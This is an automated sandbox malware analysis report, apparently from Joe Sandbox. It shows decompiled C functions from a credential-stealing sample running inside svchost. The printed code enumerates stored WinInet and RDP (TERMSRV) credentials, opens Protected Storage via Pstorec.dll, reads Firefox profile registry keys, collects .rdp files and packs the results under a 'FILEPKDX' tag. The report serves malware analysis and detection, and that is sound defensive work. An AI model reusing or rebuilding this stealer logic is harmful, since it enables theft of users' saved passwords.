                                                                                                                                        0x0bc08e6f
                                                                                                                                        0x0bc08e72
                                                                                                                                        0x0bc08e78
                                                                                                                                        0x0bc08e78
                                                                                                                                        0x0bc08e6d
                                                                                                                                        0x0bc08e46
                                                                                                                                        0x0bc08e8c
                                                                                                                                        0x0bc08e92
                                                                                                                                        0x0bc08e96
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyExA.KERNELBASE(?,?,00000000,00020019,?,HWID,?,HWID,?,?), ref: 0BC08E1A
                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000), ref: 0BC08E3B
                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?), ref: 0BC08E69
                                                                                                                                        • RegCloseKey.KERNELBASE(?), ref: 0BC08E8C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: QueryValue$CloseOpen
                                                                                                                                        • String ID: HWID
                                                                                                                                        • API String ID: 1586453840-1176364606
                                                                                                                                        • Opcode ID: 870e3b3fb710247a075d9c4e653262ac0e288c039131d3e1e918ae4c128e1574
                                                                                                                                        • Instruction ID: 1d86f805757a1f0b94d19cee7fb871d05d9243cae2a8c73cf16e2f7588149c6d
                                                                                                                                        • Opcode Fuzzy Hash: 870e3b3fb710247a075d9c4e653262ac0e288c039131d3e1e918ae4c128e1574
                                                                                                                                        • Instruction Fuzzy Hash: C2317875921209EFDF11DF85DC41CAFBFB9FBA4640B108526F824921A0DB31CE51DBA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 0BC05178, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 83COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                        			E0BC05178(void* __ebx, void* __edx) {
				signed int _v8;
				char _v48;
				void* _v52;
				void* _v56;
				void* _v60;
				char _v64;
				intOrPtr _v68;
				char _v72;
				char* _v76;
				char _v80;
				void* __edi;
				void* __esi;
				signed int _t37;
				void* _t40;
				intOrPtr* _t43;
				void* _t54;
				void* _t55;
				intOrPtr _t58;
				void* _t62;
				signed int _t64;
				signed int _t65;
				void* _t66;
				intOrPtr _t67;

				_t62 = __edx;
				_t55 = __ebx;
				_t37 =  *0xbc10000; // 0xbb40e64e
				_v8 = _t37 ^ _t65;
				_t67 =  *0xbc10d6c; // 0x1
				if(_t67 == 0) {
					 *0xbc10d6c = 1;
					_t54 = 0;
					do {
						_t2 = _t54 + "abe2869f-9b47-4cd9-a358-c22904dba7f7"; // 0x32656261
						 *(_t65 + _t54 - 0x2c) =  *_t2 << 2;
						_t54 = _t54 + 1;
					} while (_t54 < 0x25);
				}
				_t40 =  &_v56;
				_v52 = 0;
				_v56 = 0;
				__imp__CredEnumerateA("Microsoft_WinInet_*", 0, _t40,  &_v52); // executed
				if(_t40 != 0 && _v56 != 0 && _v52 != 0) {
					_t64 = 0;
					if(_v56 > 0) {
						do {
							_t43 = _v52 + _t64 * 4;
							_t58 =  *_t43;
							_t59 =  *((intOrPtr*)(_t58 + 0x1c));
							_v68 =  *((intOrPtr*)(_t58 + 0x1c));
							_v72 =  *((intOrPtr*)( *_t43 + 0x18));
							_v76 =  &_v48;
							_v80 = 0x4a;
							_v60 = 0;
							_t40 = E0BC01000( &_v72,  &_v80,  &_v64);
							_t66 = _t66 + 0xc;
							if(_t40 != 0 && _v60 != 0) {
								E0BC04B5F(_t55, _t59,  *((intOrPtr*)( *((intOrPtr*)(_v52 + _t64 * 4)) + 8)), _v60, _v64);
								_t66 = _t66 + 0xc;
								_t40 = LocalFree(_v60);
							}
							_t64 = _t64 + 1;
						} while (_t64 < _v56);
					}
					__imp__CredFree(_v52);
				}
				return E0BC09FDC(_t40, _t55, _v8 ^ _t65, _t62, 0, _t64);
			}


























                                                                                                                                        0x0bc05178
                                                                                                                                        0x0bc05178
                                                                                                                                        0x0bc0517e
                                                                                                                                        0x0bc05185
                                                                                                                                        0x0bc0518c
                                                                                                                                        0x0bc05192
                                                                                                                                        0x0bc05194
                                                                                                                                        0x0bc0519e
                                                                                                                                        0x0bc051a0
                                                                                                                                        0x0bc051a0
                                                                                                                                        0x0bc051a9
                                                                                                                                        0x0bc051ad
                                                                                                                                        0x0bc051ae
                                                                                                                                        0x0bc051a0
                                                                                                                                        0x0bc051b7
                                                                                                                                        0x0bc051c1
                                                                                                                                        0x0bc051c4
                                                                                                                                        0x0bc051c7
                                                                                                                                        0x0bc051cf
                                                                                                                                        0x0bc051e3
                                                                                                                                        0x0bc051e8
                                                                                                                                        0x0bc051ea
                                                                                                                                        0x0bc051ed
                                                                                                                                        0x0bc051f0
                                                                                                                                        0x0bc051f2
                                                                                                                                        0x0bc051f5
                                                                                                                                        0x0bc051fd
                                                                                                                                        0x0bc05203
                                                                                                                                        0x0bc05212
                                                                                                                                        0x0bc05219
                                                                                                                                        0x0bc0521c
                                                                                                                                        0x0bc05221
                                                                                                                                        0x0bc05226
                                                                                                                                        0x0bc0523e
                                                                                                                                        0x0bc05243
                                                                                                                                        0x0bc05249
                                                                                                                                        0x0bc05249
                                                                                                                                        0x0bc0524f
                                                                                                                                        0x0bc05250
                                                                                                                                        0x0bc051ea
                                                                                                                                        0x0bc05258
                                                                                                                                        0x0bc05258
                                                                                                                                        0x0bc0526b

                                                                                                                                        APIs
                                                                                                                                        • CredEnumerateA.SECHOST(Microsoft_WinInet_*,00000000,?,?), ref: 0BC051C7
                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0BC05249
                                                                                                                                        • CredFree.ADVAPI32(?), ref: 0BC05258
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CredFree$EnumerateLocal
                                                                                                                                        • String ID: J$Microsoft_WinInet_*
                                                                                                                                        • API String ID: 3201283601-3774044737
                                                                                                                                        • Opcode ID: d69a6fc35e6e9c15a0f0d6d8c26aafee67c4e1771f352eb02fbaab0f23e371a5
                                                                                                                                        • Instruction ID: 72c7b61a153ebe64652024164b4c3f099f16877bf7c45d7a36b38c4e7f0f5cc9
                                                                                                                                        • Opcode Fuzzy Hash: d69a6fc35e6e9c15a0f0d6d8c26aafee67c4e1771f352eb02fbaab0f23e371a5
                                                                                                                                        • Instruction Fuzzy Hash: 21314971D21118EFCB11DF98E984A9EBBF9FF48205F11412AE801A7251DB31AA46CF50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.34%

                                                                                                                                        Function 0BC09380, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 80UNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 49%
                                                                                                                                        			E0BC09380(void* __eax, void* __ecx) {
				signed int _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void** _t23;
				void* _t33;
				intOrPtr _t35;
				void* _t48;
				void* _t52;
				void* _t53;
				void* _t57;
				intOrPtr _t58;

				_v8 = _v8 & 0x00000000;
				_t57 = __eax;
				_t23 =  &_v12;
				__imp__GetHGlobalFromStream(__eax, _t23);
				if(_t23 >= 0) {
					_t58 = E0BC089A1(__eax, __ecx);
					_v24 = _t58;
					_t48 = GlobalLock(_v12);
					if(_t48 != 0) {
						_v16 = E0BC08D51(E0BC0B712() + 0x500000);
						_t33 = E0BC0B718(_t58);
						_t52 = _t58;
						_t35 = E0BC08D51(_t33 + 0x100000);
						_push(0);
						_push(_v16);
						_v20 = _t35;
						_push(_t58);
						_push(_t35);
						_v8 = E0BC0B726();
						GlobalUnlock(_v12);
						E0BC08B39(_t57);
						E0BC08A41("FILEPKDX", _t52, _t57, 8);
						_t53 = _t48;
						E0BC08C37(_v24);
						E0BC08C37(_v8);
						if(_v8 == 0) {
							L5:
							_v8 = _v8 & 0x00000000;
						} else {
							_t46 = _v20;
							if(_v20 == 0) {
								goto L5;
							} else {
								_v8 = E0BC08C4D(_t46, _t53, _v8);
							}
						}
						E0BC08D3D(_v16); // executed
						E0BC08D3D(_v20); // executed
					}
				}
				E0BC08B27(_t57);
				return _v8;
			}



















                                                                                                                                        0x0bc09386
                                                                                                                                        0x0bc0938d
                                                                                                                                        0x0bc0938f
                                                                                                                                        0x0bc09394
                                                                                                                                        0x0bc0939c
                                                                                                                                        0x0bc093ac
                                                                                                                                        0x0bc093ae
                                                                                                                                        0x0bc093b7
                                                                                                                                        0x0bc093bb
                                                                                                                                        0x0bc093d3
                                                                                                                                        0x0bc093d6
                                                                                                                                        0x0bc093db
                                                                                                                                        0x0bc093e1
                                                                                                                                        0x0bc093e6
                                                                                                                                        0x0bc093e8
                                                                                                                                        0x0bc093eb
                                                                                                                                        0x0bc093ee
                                                                                                                                        0x0bc093ef
                                                                                                                                        0x0bc093fc
                                                                                                                                        0x0bc093ff
                                                                                                                                        0x0bc09407
                                                                                                                                        0x0bc09413
                                                                                                                                        0x0bc0941b
                                                                                                                                        0x0bc0941c
                                                                                                                                        0x0bc09424
                                                                                                                                        0x0bc0942d
                                                                                                                                        0x0bc09444
                                                                                                                                        0x0bc09444
                                                                                                                                        0x0bc0942f
                                                                                                                                        0x0bc0942f
                                                                                                                                        0x0bc09434
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc09436
                                                                                                                                        0x0bc0943f
                                                                                                                                        0x0bc0943f
                                                                                                                                        0x0bc09434
                                                                                                                                        0x0bc0944b
                                                                                                                                        0x0bc09454
                                                                                                                                        0x0bc09459
                                                                                                                                        0x0bc093bb
                                                                                                                                        0x0bc0945c
                                                                                                                                        0x0bc09468

                                                                                                                                        APIs
                                                                                                                                        • GetHGlobalFromStream.OLE32(?,?,?,?,1.00,?,0BC01491,?,?), ref: 0BC09394
                                                                                                                                        • GlobalLock.KERNEL32 ref: 0BC093B1
                                                                                                                                          • Part of subcall function 0BC08D51: LocalAlloc.KERNELBASE(00000040,?,0BC08E59), ref: 0BC08D57
                                                                                                                                        • GlobalUnlock.KERNEL32(?,?,?,?,?,?,?,0BC01491,?,?), ref: 0BC093FF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$AllocFromLocalLockStreamUnlock
                                                                                                                                        • String ID: 1.00$FILEPKDX
                                                                                                                                        • API String ID: 1739492642-730904815
                                                                                                                                        • Opcode ID: 0f06ffca4c0cbfa0779c4b39131626ac92f97d64173bcf456ae523f1be595250
                                                                                                                                        • Instruction ID: 4476fdaa575fd3711c829becc7e6649498839bcf68156374df7c6d6e276ccb8f
                                                                                                                                        • Opcode Fuzzy Hash: 0f06ffca4c0cbfa0779c4b39131626ac92f97d64173bcf456ae523f1be595250
                                                                                                                                        • Instruction Fuzzy Hash: 3A215071931209AFDF01BBE8DC46BAEBBB8EF14351F108566E500A22D1DF748E41AA61
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 0BC06DAB, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                        			E0BC06DAB(void* __eflags, intOrPtr _a4) {
				signed int _v8;
				char _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t12;
				intOrPtr _t14;
				void* _t30;
				signed int _t33;

				_t37 = __eflags;
				_t12 =  *0xbc10000; // 0xbb40e64e
				_v8 = _t12 ^ _t33;
				_v280 = _a4;
				_t14 = E0BC08C9C(_a4, _t30, __eflags, 0x24);
				 *0xbc10d54 =  *0xbc10d54 & 0x00000000;
				_v284 = _t14;
				GetCurrentDirectoryA(0x104,  &_v276);
				E0BC0689E(_t30, _v280, 0x80000001, "Software\\Mozilla", "Firefox", "\\Mozilla\\Firefox\\"); // executed
				E0BC0689E(_t30, _v280, 0x80000002, "Software\\Mozilla", "Firefox", "\\Mozilla\\Firefox\\"); // executed
				SetCurrentDirectoryA( &_v276);
				return E0BC09FDC(E0BC08D0C(_v280, _v284, _t37), _v284, _v8 ^ _t33, _t30, "\\Mozilla\\Firefox\\", "Software\\Mozilla");
			}














                                                                                                                                        0x0bc06dab
                                                                                                                                        0x0bc06db4
                                                                                                                                        0x0bc06dbb
                                                                                                                                        0x0bc06dc6
                                                                                                                                        0x0bc06dcc
                                                                                                                                        0x0bc06dd1
                                                                                                                                        0x0bc06dd9
                                                                                                                                        0x0bc06deb
                                                                                                                                        0x0bc06e0e
                                                                                                                                        0x0bc06e24
                                                                                                                                        0x0bc06e33
                                                                                                                                        0x0bc06e58

                                                                                                                                        APIs
                                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0BC06DEB
                                                                                                                                          • Part of subcall function 0BC0689E: StrStrIA.SHLWAPI(?,?), ref: 0BC068B0
                                                                                                                                          • Part of subcall function 0BC0689E: LocalAlloc.KERNEL32(00000040,00000880), ref: 0BC06928
                                                                                                                                          • Part of subcall function 0BC0689E: RegOpenKeyA.ADVAPI32(?,?,?), ref: 0BC0693D
                                                                                                                                          • Part of subcall function 0BC0689E: RegEnumKeyExA.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0BC069C2
                                                                                                                                          • Part of subcall function 0BC0689E: RegCloseKey.KERNELBASE(?), ref: 0BC069CC
                                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?), ref: 0BC06E33
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentDirectory$AllocCloseEnumLocalOpen
                                                                                                                                        • String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\
                                                                                                                                        • API String ID: 763207988-2631691096
                                                                                                                                        • Opcode ID: 407769736be4fa500f0a68fdb9c77e03fcde370ed41ad380772a68d1c3061b20
                                                                                                                                        • Instruction ID: 1f8bd8cd660376fe6de7833cf288d9d2ed23f0bd410280526613b4dcce76e16c
                                                                                                                                        • Opcode Fuzzy Hash: 407769736be4fa500f0a68fdb9c77e03fcde370ed41ad380772a68d1c3061b20
                                                                                                                                        • Instruction Fuzzy Hash: F211C871D2021CAFCB24EB54DC4BFDA7BB8EB44715F0044E9B609A2280DE709E84CBB0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.05%

                                                                                                                                        Function 0BC073B2, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                        			E0BC073B2(void* __edx, void* __eflags, intOrPtr _a4) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				void* __ebx;
				char* _t18;
				void* _t19;
				intOrPtr _t24;
				void* _t35;
				intOrPtr* _t36;
				void* _t37;

				_t33 = __edx;
				_t34 = _a4;
				_v16 = E0BC08C9C(_a4, __edx, __eflags, 0x45);
				_t18 =  &_v8;
				_v12 = 0;
				_v8 = 0;
				__imp__CredEnumerateA("TERMSRV/*", 0, _t18,  &_v12);
				if(_t18 != 0 && _v8 != 0) {
					_t36 = _v12;
					if(_t36 != 0) {
						while(1) {
							_t24 =  *_t36;
							_t43 = _t24;
							if(_t24 == 0) {
								break;
							}
							E0BC07121(_t34, _t43,  *((intOrPtr*)(_t24 + 0x30)),  *((intOrPtr*)(_t24 + 8)),  *((intOrPtr*)(_t24 + 0x1c)),  *((intOrPtr*)(_t24 + 0x18)));
							_t37 = _t37 + 0x10;
							_t36 = _t36 + 4;
							if(_v8 != 0) {
								continue;
							}
							break;
						}
						__imp__CredFree(_v12);
					}
				}
				_t19 = E0BC091BE(5); // executed
				_t35 = _t19;
				_t45 = _t35;
				if(_t35 != 0) {
					E0BC01FD3(_t33, _t34, _t35, ".rdp", 0xbeef0000, E0BC072B4); // executed
					E0BC08D3D(_t35);
				}
				return E0BC08D0C(_t34, _v16, _t45);
			}













                                                                                                                                        0x0bc073b2
                                                                                                                                        0x0bc073bb
                                                                                                                                        0x0bc073c8
                                                                                                                                        0x0bc073cf
                                                                                                                                        0x0bc073db
                                                                                                                                        0x0bc073de
                                                                                                                                        0x0bc073e1
                                                                                                                                        0x0bc073e9
                                                                                                                                        0x0bc073f0
                                                                                                                                        0x0bc073f5
                                                                                                                                        0x0bc073f7
                                                                                                                                        0x0bc073f7
                                                                                                                                        0x0bc073f9
                                                                                                                                        0x0bc073fb
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc0740b
                                                                                                                                        0x0bc07410
                                                                                                                                        0x0bc07413
                                                                                                                                        0x0bc07419
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc07419
                                                                                                                                        0x0bc0741e
                                                                                                                                        0x0bc0741e
                                                                                                                                        0x0bc073f5
                                                                                                                                        0x0bc07426
                                                                                                                                        0x0bc0742b
                                                                                                                                        0x0bc0742e
                                                                                                                                        0x0bc07430
                                                                                                                                        0x0bc07443
                                                                                                                                        0x0bc0744c
                                                                                                                                        0x0bc07451
                                                                                                                                        0x0bc07460

                                                                                                                                        APIs
                                                                                                                                        • CredEnumerateA.ADVAPI32(TERMSRV/*,00000000,?,?), ref: 0BC073E1
                                                                                                                                        • CredFree.ADVAPI32(?), ref: 0BC0741E
                                                                                                                                          • Part of subcall function 0BC07121: StrStrIA.SHLWAPI(?,0BC0D7EC), ref: 0BC0717E
                                                                                                                                          • Part of subcall function 0BC07121: lstrlenA.KERNEL32(TERMSRV//), ref: 0BC0718A
                                                                                                                                          • Part of subcall function 0BC07121: StrStrIA.SHLWAPI(?,TERMSRV//), ref: 0BC07197
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Cred$EnumerateFreelstrlen
                                                                                                                                        • String ID: .rdp$TERMSRV/*
                                                                                                                                        • API String ID: 952440475-1749210922
                                                                                                                                        • Opcode ID: f6b7ec23722a2c863d2566bfc8345b8e75c10a624d4e9822247e6465f638a660
                                                                                                                                        • Instruction ID: fa731445dd27e400aec82dce10f05c08f20b56b64b2fae46139cc23c78b70a63
                                                                                                                                        • Opcode Fuzzy Hash: f6b7ec23722a2c863d2566bfc8345b8e75c10a624d4e9822247e6465f638a660
                                                                                                                                        • Instruction Fuzzy Hash: EF11D672E31104BFDB14AFD88C819AE7BB9EB04200F4540AAE604A7191DE30AE41DF90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.18%

                                                                                                                                        Function 0BC026A0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 74%
                                                                                                                                        			E0BC026A0(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
				signed int _v8;
				char _v108;
				signed char _v109;
				signed char _v110;
				signed char _v111;
				signed char _v112;
				signed char _v113;
				signed char _v114;
				signed char _v115;
				signed char _v116;
				signed short _v118;
				signed short _v120;
				char _v124;
				char _v128;
				void* __ebx;
				signed int _t20;
				void* _t22;
				char* _t23;
				void* _t39;
				intOrPtr _t41;
				intOrPtr _t47;
				intOrPtr _t48;
				signed int _t49;

				_t48 = __esi;
				_t47 = __edi;
				_t46 = __edx;
				_t20 =  *0xbc10000; // 0xbb40e64e
				_v8 = _t20 ^ _t49;
				_t22 = E0BC099B0( &_v128, __edx); // executed
				_t41 = _t39;
				if(_t22 == 0 || _v128 <= 0x14) {
					_t23 =  &_v124;
					__imp__CoCreateGuid(_t23);
					if(_t23 >= 0) {
						wsprintfA( &_v108, "{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}", _v124, _v120 & 0x0000ffff, _v118 & 0x0000ffff, _v116 & 0x000000ff, _v115 & 0x000000ff, _v114 & 0x000000ff, _v113 & 0x000000ff, _v112 & 0x000000ff, _v111 & 0x000000ff, _v110 & 0x000000ff, _v109 & 0x000000ff);
						_t23 = E0BC09812( &_v108, _t46, lstrlenA( &_v108));
						goto L5;
					}
				} else {
					_t23 = E0BC08D3D(_t22);
					L5:
				}
				return E0BC09FDC(_t23, _t41, _v8 ^ _t49, _t46, _t47, _t48);
			}


























                                                                                                                                        0x0bc026a0
                                                                                                                                        0x0bc026a0
                                                                                                                                        0x0bc026a0
                                                                                                                                        0x0bc026a6
                                                                                                                                        0x0bc026ad
                                                                                                                                        0x0bc026b4
                                                                                                                                        0x0bc026b9
                                                                                                                                        0x0bc026bc
                                                                                                                                        0x0bc026cc
                                                                                                                                        0x0bc026d0
                                                                                                                                        0x0bc026d8
                                                                                                                                        0x0bc02718
                                                                                                                                        0x0bc0272f
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc0272f
                                                                                                                                        0x0bc026c4
                                                                                                                                        0x0bc026c5
                                                                                                                                        0x0bc02734
                                                                                                                                        0x0bc02734
                                                                                                                                        0x0bc02740

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0BC099B0: GetTempPathA.KERNEL32(00000104,?,00000000,?,?,?), ref: 0BC099F9
                                                                                                                                          • Part of subcall function 0BC099B0: CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?), ref: 0BC09A1A
                                                                                                                                          • Part of subcall function 0BC099B0: GetHGlobalFromStream.OLE32(?,?,?,?,?), ref: 0BC09A85
                                                                                                                                          • Part of subcall function 0BC099B0: GlobalLock.KERNEL32 ref: 0BC09A95
                                                                                                                                          • Part of subcall function 0BC099B0: GlobalUnlock.KERNEL32(?,00000000,00000000,00000000,?,?,?), ref: 0BC09ABC
                                                                                                                                        • CoCreateGuid.OLE32(?), ref: 0BC026D0
                                                                                                                                        • wsprintfA.USER32 ref: 0BC02718
                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0BC02725
                                                                                                                                          • Part of subcall function 0BC08D3D: LocalFree.KERNELBASE(00000000,?,0BC08E77,?), ref: 0BC08D49
                                                                                                                                        Strings
                                                                                                                                        • {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}, xrefs: 0BC02712
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$CreateStream$FreeFromGuidLocalLockPathTempUnlocklstrlenwsprintf
                                                                                                                                        • String ID: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
                                                                                                                                        • API String ID: 2318201168-752031952
                                                                                                                                        • Opcode ID: ce783cea41d1cda7f30d286b58ad06aaee902a3cbdf7ccbdf8bde504ff99d731
                                                                                                                                        • Instruction ID: 749b30ad1b945b525fe58c70c667ded8c7ef3ceec68cbe39a755414c7eb902a9
                                                                                                                                        • Opcode Fuzzy Hash: ce783cea41d1cda7f30d286b58ad06aaee902a3cbdf7ccbdf8bde504ff99d731
                                                                                                                                        • Instruction Fuzzy Hash: 101142A1D24258AECF21DBF98C14AFEBBFCAE0D501F100056B565E7082DA28C644DF30
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.25%

                                                                                                                                        Function 0BC05547, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 55libraryloaderUNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 62%
                                                                                                                                        			E0BC05547(void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v24;
				intOrPtr* _v28;
				void* __ebx;
				struct HINSTANCE__* _t11;
				_Unknown_base(*)()* _t12;
				intOrPtr* _t20;
				void* _t31;
				CHAR* _t32;
				signed int _t38;

				_t33 = _a4;
				_v12 = 0;
				_v8 = E0BC08C9C(_a4, _t31, __eflags, 0x2f);
				 *((intOrPtr*)((_t38 & 0xfffffff8) - 0xc)) = "Pstorec.dll"; // executed
				_t11 = LoadLibraryA(_t32); // executed
				_t12 = GetProcAddress(_t11, "PStoreCreateInstance");
				_push(0);
				_push(0);
				_push(0);
				_push( &_v12);
				if( *_t12() >= 0) {
					_t44 = _v28;
					if(_v28 != 0) {
						E0BC04A80(_t33, _v28, E0BC04C40);
						_t20 = _v28;
						 *((intOrPtr*)( *_t20 + 8))(_t20);
					}
				}
				E0BC0509B(_t33); // executed
				E0BC05178(_t33, _t31); // executed
				E0BC0526C(_t33); // executed
				return E0BC08D0C(_t33, _v24, _t44);
			}














                                                                                                                                        0x0bc05553
                                                                                                                                        0x0bc0555c
                                                                                                                                        0x0bc05565
                                                                                                                                        0x0bc05569
                                                                                                                                        0x0bc05570
                                                                                                                                        0x0bc0557c
                                                                                                                                        0x0bc05582
                                                                                                                                        0x0bc05583
                                                                                                                                        0x0bc05584
                                                                                                                                        0x0bc05589
                                                                                                                                        0x0bc0558e
                                                                                                                                        0x0bc05590
                                                                                                                                        0x0bc05594
                                                                                                                                        0x0bc055a0
                                                                                                                                        0x0bc055a5
                                                                                                                                        0x0bc055af
                                                                                                                                        0x0bc055af
                                                                                                                                        0x0bc05594
                                                                                                                                        0x0bc055b3
                                                                                                                                        0x0bc055bb
                                                                                                                                        0x0bc055c1
                                                                                                                                        0x0bc055d8

                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNELBASE(0000002F), ref: 0BC05570
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 0BC0557C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: PStoreCreateInstance$Pstorec.dll
                                                                                                                                        • API String ID: 2574300362-757229339
                                                                                                                                        • Opcode ID: 40118a5a8e938ab17717caa859a52527686956645590603e3dccca7518228f0f
                                                                                                                                        • Instruction ID: 8e173bcb024610d1b755fc9d75534d728755b82121c474cc1b2d9b4f2bc9ec1c
                                                                                                                                        • Opcode Fuzzy Hash: 40118a5a8e938ab17717caa859a52527686956645590603e3dccca7518228f0f
                                                                                                                                        • Instruction Fuzzy Hash: CC01C0716352016BC210BF69AC8986FBBE8DF98A61F00451DF645861C0CE24DA45EAF2
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 0BC08A86, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55fileUNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 81%
                                                                                                                                        			E0BC08A86(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, CHAR* _a4) {
				signed int _v8;
				void _v4104;
				void* _v4108;
				long _v4112;
				void* __edi;
				void* __esi;
				signed int _t14;
				void* _t17;
				int _t20;
				struct _OVERLAPPED* _t22;
				intOrPtr _t30;
				intOrPtr _t31;
				struct _OVERLAPPED* _t32;
				signed int _t34;

				_t30 = __edx;
				_t27 = __ecx;
				_t25 = __ebx;
				E0BC0B780(0x100c);
				_t14 =  *0xbc10000; // 0xbb40e64e
				_v8 = _t14 ^ _t34;
				_t32 = 0;
				_t31 = __ecx; // executed
				_t17 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0, 0); // executed
				_v4108 = _t17;
				if(_t17 != 0xffffffff) {
					_push(__ebx);
					while(1) {
						_t20 = ReadFile(_v4108,  &_v4104, 0x1000,  &_v4112, _t32); // executed
						if(_t20 == 0) {
							break;
						}
						E0BC08A41( &_v4104, _t27, _t31, _v4112); // executed
						_pop(_t27);
						if(_v4112 != _t32) {
							continue;
						} else {
							_t32 = 1;
						}
						break;
					}
					FindCloseChangeNotification(_v4108); // executed
					_t22 = _t32;
